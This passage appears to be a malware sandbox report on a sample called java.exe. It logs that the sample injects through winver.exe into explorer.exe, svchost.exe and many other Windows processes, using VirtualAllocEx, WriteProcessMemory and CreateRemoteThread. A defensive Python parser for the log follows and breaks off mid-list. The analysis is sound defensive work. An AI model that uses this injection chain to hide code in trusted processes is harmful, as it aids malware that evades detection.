            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 6E0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 14D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2A30000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5E0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2960000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 3010000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2560000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 13C0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 13B0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 25F0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2EF0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 550000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A10000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: BD0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 550000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2C30000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 25F0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 910000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 940000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2C90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2DA0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 8D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2DC0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2AE0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2130000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 720000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 23D0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2B40000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 26C0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2100000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2510000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: FE0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1170000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: E70000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2610000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5E0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: F70000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 550000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: FE0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 910000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 24C0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1490000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1380000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1310000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 720000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 6B0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2530000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5E0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 22F0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2ED0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 8F0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1050000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 5E0000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 980000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 990000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 2900000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: 1510000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A40000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Memory allocated: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe base: A90000 protect: page execute and read and write
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_02F00DE0 VirtualAllocEx, WriteProcessMemory, CreateRemoteThread
            Source: C:\Windows\explorer.exe | Code function: 3_2_013A1F8D VirtualAllocEx, WriteProcessMemory, CreateRemoteThread
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\explorer.exe EIP: 13A08B3Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\sihost.exe EIP: AC090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 91090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 9A090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\ctfmon.exe EIP: A5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\explorer.exe EIP: 138090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: D4090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe EIP: B5090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 11090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe EIP: A9090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: AB090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\smartscreen.exe EIP: 29090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe EIP: 58090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 3D090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 90090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\ApplicationFrameHost.exe EIP: 18090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe EIP: A1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 19090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\ImmersiveControlPanel\SystemSettings.exe EIP: F1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\oobe\UserOOBEBroker.exe EIP: 1090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\svchost.exe EIP: 22090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeThread created: C:\Windows\System32\dllhost.exe EIP: 6E090BJump to behavior
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Windows\System32\conhost.exe EIP: E6090B
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 94090B
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Windows\System32\backgroundTaskHost.exe EIP: 40090B
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: B0090B
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 286090B
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 2BB090B
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 256090B
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 261090B
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 252090B
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 2B2090B
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 145090B
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 262090B
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: EE090B
            Source: C:\Windows\SysWOW64\winver.exe; Thread created: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe EIP: 2D3090B
            Source: C:\Windows\explorer.exe; Thread created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe EIP: 1C090B
            Source: C:\Windows\explorer.exe; Thread created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe EIP: 1C090B
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: PID: 2580 base: 13A0000 value: 50
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: PID: 2580 base: 1380000 value: 50
            Source: C:\Users\user\Desktop\java.exe; Memory written: C:\Windows\SysWOW64\winver.exe base: 4418B0
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\explorer.exe base: 13A0000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\sihost.exe base: AC0000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\svchost.exe base: 910000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\svchost.exe base: 9A0000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\ctfmon.exe base: A50000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\explorer.exe base: 1380000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\svchost.exe base: D40000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\RuntimeBroker.exe base: 110000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\RuntimeBroker.exe base: AB0000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\smartscreen.exe base: 290000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\RuntimeBroker.exe base: 3D0000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\RuntimeBroker.exe base: 900000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 180000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\RuntimeBroker.exe base: 190000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\svchost.exe base: 220000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\dllhost.exe base: 6E0000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\conhost.exe base: E60000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\RuntimeBroker.exe base: 940000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 400000
            Source: C:\Windows\SysWOW64\winver.exe; Memory written: C:\Windows\System32\RuntimeBroker.exe base: B00000
            Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe base: 1C0000Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe base: 1C0000Jump to behavior
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\SysWOW64\winver.exe winverJump to behavior
Source: java.exe, 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp; winver.exe, 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp; explorer.exe, 00000003.00000000.1635935330.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.2921450784.00000000018A1000.00000002.00000001.00040000.00000000.sdmp; explorer.exe, 00000003.00000000.1634885341.00000000018A0000.00000002.00000001.00040000.00000000.sdmp; sihost.exe, 00000004.00000002.2925576219.000001CD41221000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.1634654042.0000000001240000.00000004.00000020.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2901515644.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
Source: winver.exe, 00000002.00000002.2893231988.0000000002C7C000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: tShell_TrayWnd*(d
Source: explorer.exe, 00000003.00000002.2921450784.00000000018A1000.00000002.00000001.00040000.00000000.sdmp; explorer.exe, 00000003.00000000.1634885341.00000000018A0000.00000002.00000001.00040000.00000000.sdmp; sihost.exe, 00000004.00000002.2925576219.000001CD41221000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: winver.exe, 00000002.00000002.2893231988.0000000002C7C000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: tShell_TrayWnd
Source: explorer.exe, 00000003.00000002.2921450784.00000000018A1000.00000002.00000001.00040000.00000000.sdmp; explorer.exe, 00000003.00000000.1634885341.00000000018A0000.00000002.00000001.00040000.00000000.sdmp; sihost.exe, 00000004.00000002.2925576219.000001CD41221000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\java.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133477548824988414.txt VolumeInformation
Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Queries volume information: C:\ VolumeInformation
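The "Memory written" and "Process created" lines above are the raw material of the injection chain java.exe -> winver.exe -> the process under C:\Program Files (x86), with explorer.exe in turn writing into the dropped bin.exe, and the Shell_TrayWnd / Progman strings are the window classes an injector typically resolves to find explorer.exe. The Python below is an added triage helper, not part of the Joe Sandbox report and not Tinba's code: it parses such lines (copied from this report as its constructed sample input) into an injection graph, counts the distinct regions written into each target, and reports the explorer window-class hints. The regular expressions, the Windows-directory heuristic and the event layout are this example's own assumptions.

```python
"""Added triage helper, not part of the Joe Sandbox report: rebuilds the
process-injection graph from the report's "Memory written" / "Process created"
lines and flags strings hinting that the sample finds explorer.exe by window class."""
import re
from collections import defaultdict

# Constructed sample input: lines copied from this report, with the trailing
# "Jump to behavior" link text dropped and a space inserted where extraction fused
# two table cells (the regexes accept both forms); source lists are abridged.
Q = r"C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe"
LINES = [rf"Source: C:\Windows\SysWOW64\winver.exe Memory written: {Q} base: {b}"
         for b in ("8F0000", "1050000", "5E0000", "980000", "990000", "2900000", "1510000", "A40000", "A90000")] + [
    r"Source: C:\Windows\explorer.exe Memory written: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe base: 1C0000",
    r"Source: C:\Windows\explorer.exe Memory written: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe base: 1C0000",
    r"Source: C:\Users\user\Desktop\java.exe Process created: C:\Windows\SysWOW64\winver.exe winver",
    "Source: java.exe, 00000000.00000002.1654114084.0000000002260000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd",
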